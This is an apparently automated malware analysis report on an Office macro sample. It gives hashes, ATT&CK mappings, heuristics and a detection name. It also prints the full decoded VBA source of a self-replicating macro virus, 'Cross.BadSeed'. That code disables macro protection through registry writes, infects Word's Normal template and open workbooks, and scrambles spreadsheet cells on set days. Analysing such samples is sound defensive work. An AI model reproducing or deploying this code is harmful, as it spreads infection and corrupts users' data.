Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce50c388dbd95ca4…

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-12-14 16:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-03
MD5: ecc53fe9b3a6103f0cdb73bd1366cf46 SHA-1: 3c2f76a714e24984efaf7effddd2c5ac39f1fb83 SHA-256: ce50c388dbd95ca4a648a225552aca271456c7e60b0fefb0f2945f62693606f7
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File

The sample contains VBA macros, specifically a Workbook_Open macro, which is a common technique for initial execution. The script attempts to disable antivirus by modifying registry keys related to Excel, specifically writing to 'HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6' and 'HKLM\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6'. It also manipulates the Normal.dot template, suggesting an attempt to establish persistence or ensure continued execution. The presence of 'CreateObject' and 'GetObject' calls further indicates dynamic execution capabilities.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3724 bytes
SHA-256: c527b9b862c9222265930efee784f60071a63f976134df3db253d7ea14c170a2
Detection
ClamAV: Doc.Trojan.Hopper-12
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.41 /1nternal
Private InRoutine As Boolean
Private Sub Workbook_Deactivate()
    On Error Resume Next
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        Set WordObj = GetObject(, "Word.Application")
        If WordObj = "" Then
            Set WordObj = CreateObject("Word.Application")
            Quit = True
        End If
        Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
        If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
            WordObj.Options.SaveNormalPrompt = False
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
            WordObj.Run "Normal.ThisDocument.DisableAV"
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
        Set NT = Nothing
        If Quit = True Then WordObj.Application.Quit
        Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
        Workbooks("Book1.").Close SaveChanges:=True
    End If
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
    Next
    If ActiveWorkbook.Name <> "Book1." Then
        Select Case Day(Now)
            Case 1 And Int((Rnd * 10) + 1) = 1
                For i = 1 To 10
                    ActiveSheet.Cells(Int(Rnd * 100), Int(Rnd * 100)).AddComment "Cross.BadSeed v0.41"
                Next
            Case 10 And Int((Rnd * 3) + 1) = 1
                For f = 1 To 5
                    CellCol = Int(Rnd * 15) + 2
                    For i = 1 To 30
                        Row1 = Int(Rnd * 200) + 10
                        Row2 = Int(Rnd * 200) + 10
                        TempVal = ActiveSheet.Cells(Row1, CellCol)
                        ActiveSheet.Cells(Row1, CellCol) = ActiveSheet.Cells(Row2, CellCol)
                        ActiveSheet.Cells(Row2, CellCol) = TempVal
                    Next
                Next
            Case 15
                Author = "1nternal"
            Case 20 And Int((Rnd * 5) + 1) = 1
                Application.StatusBar = "Cross.BadSeed v0.41 /1nternal"
        End Select
    End If
End Sub

Private Sub Workbook_Open()

End Sub